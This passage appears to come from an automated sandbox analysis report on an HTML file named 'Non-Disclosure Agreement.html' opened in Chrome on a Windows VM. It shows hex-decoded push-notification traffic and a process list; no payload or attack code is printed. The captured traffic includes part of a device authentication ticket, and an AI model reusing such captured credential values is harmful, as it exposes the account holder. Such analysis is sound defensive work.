                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:37:16 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 66 75 75 50 56 41 6d 78 79 55 61 34 36 65 63 30 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 38 64 35 34 36 37 35 34 63 38 34 33 34 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: fuuPVAmxyUa46ec0.2Context: 758d546754c84344<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:37:16 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 66 75 75 50 56 41 6d 78 79 55 61 34 36 65 63 30 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 35 38 64 35 34 36 37 35 34 63 38 34 33 34 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: fuuPVAmxyUa46ec0.3Context: 758d546754c84344<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:37:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:37:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 74 47 30 47 37 54 42 33 44 6b 61 76 45 48 65 42 4e 6f 47 39 51 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: tG0G7TB3DkavEHeBNoG9Qw.0Payload parsing failed.


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              37192.168.2.65006420.198.118.190443
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:37:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 31 32 2b 72 50 76 59 44 30 32 76 6c 55 78 57 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 64 63 34 61 66 64 63 33 33 30 32 61 65 36 0d 0a 0d 0a
                                                                                              Data Ascii: CNT 1 CON 305MS-CV: h12+rPvYD02vlUxW.1Context: 20dc4afdc3302ae6
                                                                                              2024-12-19 13:37:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                              2024-12-19 13:37:51 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 68 31 32 2b 72 50 76 59 44 30 32 76 6c 55 78 57 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 64 63 34 61 66 64 63 33 33 30 32 61 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 52 77 4f 61 41 2f 57 53 54 55 49 37 56 76 56 4c 72 36 6c 42 56 65 79 30 4b 45 5a 4a 71 75 45 79 42 49 74 2f 32 63 46 6e 42 67 43 2b 48 53 5a 30 31 31 62 68 6f 73 36 44 6f 56 59 68 63 49 4d 74 49 58 79 72 39 76 2b 69 34 78 57 30 4e 52 46 67 4a 68 49 51 6a 51 6e 79 6b 4b 41 2f 33 4f 6b 6b 6d 4f 78 47 70 30 32 66 47 6b 4c 75
                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: h12+rPvYD02vlUxW.2Context: 20dc4afdc3302ae6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAYRwOaA/WSTUI7VvVLr6lBVey0KEZJquEyBIt/2cFnBgC+HSZ011bhos6DoVYhcIMtIXyr9v+i4xW0NRFgJhIQjQnykKA/3OkkmOxGp02fGkLu
                                                                                              2024-12-19 13:37:51 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 31 32 2b 72 50 76 59 44 30 32 76 6c 55 78 57 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 30 64 63 34 61 66 64 63 33 33 30 32 61 65 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: h12+rPvYD02vlUxW.3Context: 20dc4afdc3302ae6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                              2024-12-19 13:37:52 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                              Data Ascii: 202 1 CON 58
                                                                                              2024-12-19 13:37:52 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 36 36 71 70 36 7a 43 75 45 57 71 6f 4f 6e 44 77 35 37 6d 64 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                              Data Ascii: MS-CV: 766qp6zCuEWqoOnDw57mdw.0Payload parsing failed.


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Target ID:1
                                                                                              Start time:08:35:40
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Non-Disclosure Agreement.html"
                                                                                              Imagebase:0x7ff684c40000
                                                                                              File size:3'242'272 bytes
                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:08:35:44
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1932,i,11547400420386524786,6182731233480577917,262144 /prefetch:8
                                                                                              Imagebase:0x7ff684c40000
                                                                                              File size:3'242'272 bytes
                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              No disassembly